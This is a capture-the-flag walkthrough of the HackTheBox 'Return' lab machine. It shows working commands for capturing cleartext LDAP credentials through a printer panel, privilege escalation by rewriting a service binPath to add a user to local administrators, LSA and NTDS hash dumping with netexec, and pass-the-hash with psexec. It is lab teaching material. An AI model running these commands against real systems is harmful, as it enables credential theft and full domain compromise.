Return

AD box on HTB.

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                                                                                                        
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.148.204                                                                                            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-09 20:04 +03                                                                                                                                                                                                                                           
Nmap scan report for 10.129.148.204                                                                                                                                         
Host is up, received echo-reply ttl 127 (0.22s latency).                                                                                                                    
Scanned at 2025-09-09 20:04:39 +03 for 222s                                                                                                                                 
Not shown: 65509 closed tcp ports (reset)                                                                                                                                   
PORT      STATE SERVICE       REASON          VERSION                                 
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                               
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0                
|_http-title: HTB Printer Admin Panel                                                                                                                                       
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                    
| http-methods:                                                                                                                                                             
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                                                                                                          
|_  Potentially risky methods: TRACE                                                                                                                                        
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-09 17:23:55Z)                                                                
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                                                                                                         
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn                                                                                                 
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                               
445/tcp   open  microsoft-ds? syn-ack ttl 127                                                                                                                               
464/tcp   open  kpasswd5?     syn-ack ttl 127                                                                                                                               
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0                                                                                           
636/tcp   open  tcpwrapped    syn-ack ttl 127                                                                                                                               
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)                               
3269/tcp  open  tcpwrapped    syn-ack ttl 127                                                                                                                               
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                       
|_http-title: Not Found                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                           
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing                    
<snipped>                                                                                                       
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

We have multiple open ports that indicate active directory domain controller, we have also http on port 80.

We can get the machine name and the domain using netexec as well:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                  
└─$ netexec smb 10.129.148.204                                                        
SMB         10.129.148.204  445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

So I will add the machine IP and the FQDN to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                                                                                                        
└─$ cat /etc/hosts                                                                                                                                                          
127.0.0.1       localhost                                                                                                                                                   
127.0.1.1       kali                                                                                                                                                        
<snipped>                                                     
                                                                                      
10.129.148.204 PRINTER.return.local return.local PRINTER

Lets open up return.local with firefox:

Pages other than settings redirect us to the same page.

Exploitation:

What do we have on the settings page:

We can launch burpsuite, and click on the update button to see how the request will go to the web server:

Its post request, and other parameters were not specified.

Lets send this request to repeater, and try to play with that ip parameter:

I tried to see if it connects back to us with python web server on port 80, but nothing happened, going back to the settings.php page, we will find the server port is 389 which is ldap.

We can start responder to listen for any ldap traffic:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                  
└─$ sudo responder -I tun0 -dvw                                                                                                                                             
                                         __                                                                                                                                 
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                                    
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                                    
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                      
                   |__|                                                                                                                                                     
                                                                                                                                                                            
                                                                                                                                                                            
[+] Poisoners:                                                                                                                                                              
    LLMNR                      [ON]                                                                                                                                         
    NBT-NS                     [ON]                                                   
    MDNS                       [ON]                                                   
    DNS                        [ON]                                                   
    DHCP                       [ON]                                                                                                                                         
                                                                                                                                                                            
[+] Servers:                                                                                                                                                                
    HTTP server                [ON]                                                                                                                                         
    HTTPS server               [ON]                                                                                                                                         
    WPAD proxy                 [ON]                                                                                                                                         
    Auth proxy                 [OFF]                                                                                                                                        
    SMB server                 [ON]                                                                                                                                         
    Kerberos server            [ON]                                                                                                                                         
    SQL server                 [ON]                                                                                                                                         
    FTP server                 [ON]                                                                                                                                         
    IMAP server                [ON]                                                                                                                                         
    POP3 server                [ON]                                                                                                                                             SMTP server                [ON]                                                                                                                                         
    DNS server                 [ON]                                                                                                                                         
    LDAP server                [ON]                                                                                                                                         
    MQTT server                [ON]                                                                                                                                         
    RDP server                 [ON]                                                                                                                                         
    DCE-RPC server             [ON]                                                                                                                                         
    WinRM server               [ON]                                                   
    SNMP server                [ON]                                                   
                                                                                                                                                                            
[+] HTTP Options:                                                                                                                                                           
    Always serving EXE         [OFF]                                                                                                                                        
    Serving EXE                [OFF]                                                                                                                                        
    Serving HTML               [OFF]                                                                                                                                        
    Upstream Proxy             [OFF]
[+] Poisoning Options:                                                                                                                                                      
    Analyze Mode               [OFF]                                                                                                                                        
    Force WPAD auth            [OFF]                                                                                                                                        
    Force Basic Auth           [OFF]                                                                                                                                        
    Force LM downgrade         [OFF]                                                                                                                                        
    Force ESS downgrade        [OFF]                                                                                                                                                                                                                                                                                                                    
[+] Generic Options:                                                                                                                                                        
    Responder NIC              [tun0]                                                                                                                                       
    Responder IP               [10.10.16.4]                                                                                                                                 
    Responder IPv6             [dead:beef:4::1002]                                                                                                                          
    Challenge set              [random]                                                                                                                                     
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']                             
    Don't Respond To MDNS TLD  ['_DOSVC']                                                                                                                                   
    TTL for poisoned response  [default]                                                                                                                                    
                                                                                                                                                                            
[+] Current Session Variables:                                                                                                                                              
    Responder Machine Name     [WIN-2K33M3WIHK7]                                                                                                                            
    Responder Domain Name      [Y37M.LOCAL]                                                                                                                                 
    Responder DCE-RPC Port     [47845]                                                                                                                                      
                                                                                                                                                                            
[*] Version: Responder 3.1.7.0             
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>                                   
[*] To sponsor Responder: https://paypal.me/PythonResponder                           

[+] Listening for events...

[LDAP] Attempting to parse an old simple Bind request.                                
[LDAP] Cleartext Client   : 10.129.148.204 
[LDAP] Cleartext Username : return\svc-printer                                        
[LDAP] Cleartext Password : 1edFg4******   
[+] Exiting...

Here we got ldap credentials.

We can capture it via netcat as well:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                  
└─$ nc -nlvp 389                                                                      
listening on [any] 389 ...                                                            
connect to [10.10.16.4] from (UNKNOWN) [10.129.148.204] 54224                         
0*`%return\svc-printer                     
                      1edFg4******

Shell as svc-printer:

We can check if svc-printer has any remote access:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                  
└─$ netexec winrm printer.return.local -u svc-printer -p '1edFg4******'                                                                                                     
WINRM       10.129.148.204  5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)                                           
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 an
d will be removed from this module in 48.0.0.                                         
  arc4 = algorithms.ARC4(self._key)        
WINRM       10.129.148.204  5985   PRINTER          [+] return.local\svc-printer:1edFg4****** (Pwn3d!)

We will see that we have remote access using WinRM.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                                                                                                        
└─$ evil-winrm -i 10.129.148.204 -u svc-printer -p '1edFg4******' 
                                                                                                          
Evil-WinRM shell v3.7                                                                                                                                                       
                                                                                                                                                                            
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                            
                                                                                                                                                                            
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                       
                                                                                                                                                                            
Info: Establishing connection to remote endpoint                                                                                                                            
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

Post-Exploitation:

Abuse Server Operators group:

Lets check our privileges:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all                                                                                               20:43:01 [321/334]
                                                                                                                                                                            
USER INFORMATION                                                                                                                                                            
----------------                                                                                                                                                            
                                                                                                                                                                            
User Name          SID                                                                                                                                                      
================== =============================================                                                                                                            
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103                                                                                                            
                                                                                                                                                                            
                                                                                                                                                                            
GROUP INFORMATION                                                                                                                                                           
-----------------                                                                                                                                                           
                                                                                                                                                                            
Group Name                                 Type             SID          Attributes                                                                                         
========================================== ================ ============ ==================================================                                                 
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                                 
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group                                                 
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group                                                 
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group                                                 
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                                 
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group                                                 
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group                                                 
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                                 
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group                                                 
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group                                                 
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                    
                                                                                                                                                                            
                                                                                                                                                                            
PRIVILEGES INFORMATION                                                                                                                                                      
----------------------                                                                                                                                                      

Privilege Name                Description                         State               
============================= =================================== =======             
SeMachineAccountPrivilege     Add workstations to domain          Enabled             
SeLoadDriverPrivilege         Load and unload device drivers      Enabled             
SeSystemtimePrivilege         Change the system time              Enabled             
SeBackupPrivilege             Back up files and directories       Enabled             
SeRestorePrivilege            Restore files and directories       Enabled             
SeShutdownPrivilege           Shut down the system                Enabled             
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled             
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled             
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled             
SeTimeZonePrivilege           Change the time zone                Enabled
                                                                                                                                                                            
USER CLAIMS INFORMATION                                                                                                                                                     
-----------------------                                                                                                                                                     
                                                                                                                                                                            
User claims unknown.                                                                                                                                                        
                                                                                                                                                                            
Kerberos support for Dynamic Access Control on this device has been disabled.

We are members of the Print Operators group, combined with SeLoadDriverPrivilege, this can allow us to load a vulnerable driver and exploit it.

We can see that we are member of Server Operators group, which will grant us with SeBackupPrivilege, and SeRestorePrivilege privileges.

Also this group grants us with some server modification capabilities.

So we can for example change binpath of a service running with high privileged user to add svc-printer user to the local administrators group:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> services                              
                                                                                      
Path                                                                                                                 Privileges Service                                     
----                                                                                                                 ---------- -------                                     
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS                                        
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796                               
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing                           
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost                                    
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense                                       
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller                            
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService                               
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools                                     
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc                                    
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend                                   
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

We can for example chnage the binpath of vmtools, we can see besides it under privileges column it says true as well:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="net localgroup administrators svc-printer /add"                                              
[SC] ChangeServiceConfig SUCCESS

Before restarting the service lets check the administrators local group:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.

Stop and start that service:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools                                                                                                         
                                                                                                                                                                            
SERVICE_NAME: VMTools                                                                                                                                                       
        TYPE               : 10  WIN32_OWN_PROCESS                                                                                                                          
        STATE              : 1  STOPPED                                                                                                                                     
        WIN32_EXIT_CODE    : 0  (0x0)                                                                                                                                       
        SERVICE_EXIT_CODE  : 0  (0x0)                                                                                                                                       
        CHECKPOINT         : 0x0                                                                                                                                            
        WAIT_HINT          : 0x0                                                                                                                                            
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools                                                                                                        
[SC] StartService FAILED 1053:                                                                                                                                              
                                                                                                                                                                            
The service did not respond to the start or control request in a timely fashion.

It throwed an error, but if we checked the administrators local group:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.

We will see that we are now part of that group.

Dump the secrets:

What we can do now is to dump secrets for example, sam, lsa, etc.

I will use netexec to help us with this:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u svc-printer -p '1edFg4******' --lsa                           
SMB         10.129.148.204  445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) 
SMB         10.129.148.204  445    PRINTER          [+] return.local\svc-printer:1edFg4****** (Pwn3d!)
SMB         10.129.148.204  445    PRINTER          [+] Dumping LSA secrets
SMB         10.129.148.204  445    PRINTER          RETURN\PRINTER$:aes256-cts-hmac-sha1-96:701e48cb390a55cb1fcb814b9b4f59ad135f2904e8e0e78d8391f77cd13d****
SMB         10.129.148.204  445    PRINTER          RETURN\PRINTER$:aes128-cts-hmac-sha1-96:5fc0305293df0099525728a3a0a0f9ef
SMB         10.129.148.204  445    PRINTER          RETURN\PRINTER$:des-cbc-md5:1ca204918a2a6226
SMB         10.129.148.204  445    PRINTER          RETURN\PRINTER$:plain_password_hex:5ddbb4747a7f0339488ec50284f01f7f3790e4371bf48777832a85073d7968454967fb7539ba4012404fe64f084614e76297163be08a9f28ae54e76351bc0de8acf09ee1a0100dde87afd9831ff9613e3131430e9b05f2b252b8580afb0a7fb6af1929377c62c5bba527f0832c916fc330ba638bb572cbe9da532c04882f55448b1bfef43c143fd3631063cd32378374d90f97e96a8a62ee4b5e2666fc042d5c36e06e290655a62d3553e0b278de7c8e02560409942352345e15f825497a8b9c245b98ba3acc7a67848a18189e0f835c0addd1837dee0f0124eec557472dfc6fd11d6af67cb20bf61916c8941bbac32e
SMB         10.129.148.204  445    PRINTER          RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB         10.129.148.204  445    PRINTER          dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
SMB         10.129.148.204  445    PRINTER          [+] Dumped 6 LSA secrets to /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.secrets and /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.cached
                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u printer$ -H ba0cf7a0c94a04c0**************** --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] 
SMB         10.129.148.204  445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) 
SMB         10.129.148.204  445    PRINTER          [+] return.local\printer$:ba0cf7a0c94a04c0**************** 
SMB         10.129.148.204  445    PRINTER          [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.129.148.204  445    PRINTER          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.129.148.204  445    PRINTER          Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1****************:::
SMB         10.129.148.204  445    PRINTER          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931****************:::
SMB         10.129.148.204  445    PRINTER          krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add3****************:::
SMB         10.129.148.204  445    PRINTER          return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246****************:::
SMB         10.129.148.204  445    PRINTER          PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB         10.129.148.204  445    PRINTER          [+] Dumped 5 NTDS hashes to /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds of which 4 were added to the database
SMB         10.129.148.204  445    PRINTER          [*] To extract only enabled accounts from the output file, run the following command: 
SMB         10.129.148.204  445    PRINTER          [*] cat /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | grep -iv disabled | cut -d ':' -f1
SMB         10.129.148.204  445    PRINTER          [*] grep -iv disabled /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | cut -d ':' -f1

We can now use that administrator ntlm hash to authenticate to the target machine as him:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]                                                                                                        20:56:39 [61/88]
└─$ impacket-psexec return.local/administrator@10.129.148.204 -hashes :32db622ed9c00dd1****************                                                                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                  
                                                                                                                                                                            
[*] Requesting shares on 10.129.148.204.....                                                                                                                                
[*] Found writable share ADMIN$                                                      
[*] Uploading file rOqKosif.exe                                                                                                                                            
[*] Opening SVCManager on 10.129.148.204.....                                                                                                                               
[*] Creating service yhCC on 10.129.148.204.....                                                                                                                            
[*] Starting service yhCC.....                                                                                                                                              
[!] Press help for extra shell commands                                              
Microsoft Windows [Version 10.0.17763.107]                                                                                                                                  
(c) 2018 Microsoft Corporation. All rights reserved.                                                                                                                        
                                                                                                                                                                            
C:\Windows\system32> whoami                                                          
nt authority\system                                                                  
                                                                                                                                                                            
C:\Windows\system32> hostname                                                        
printer                                                                                                                                                                     
                                                                                     
C:\Windows\system32> ipconfig                                                        
                                                                                      
Windows IP Configuration                                                                                                                                                    
                                                                                     
                                                                                     
Ethernet adapter Ethernet0:                                                                                                                                                
                                                                                     
   Connection-specific DNS Suffix  . : .htb                                                                                                                                
   IPv6 Address. . . . . . . . . . . : dead:beef::fc21:a949:71d3:32b5                
   Link-local IPv6 Address . . . . . : fe80::fc21:a949:71d3:32b5%10                  
   IPv4 Address. . . . . . . . . . . : 10.129.148.204                                
   Subnet Mask . . . . . . . . . . . : 255.255.0.0                                   
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10                   
                                       10.129.0.1

We can also read the flags:

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt                    
84ebbe6b63a6319a****************                                                                       

C:\Windows\system32> type C:\Users\svc-printer\Desktop\user.txt                       
19119e2dab6f9a64****************

PreviousFlight NextBlackfield

Last updated 4 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagExploitation:

hashtagShell as svc-printer:

hashtagPost-Exploitation:

hashtagAbuse Server Operators group:

hashtagDump the secrets: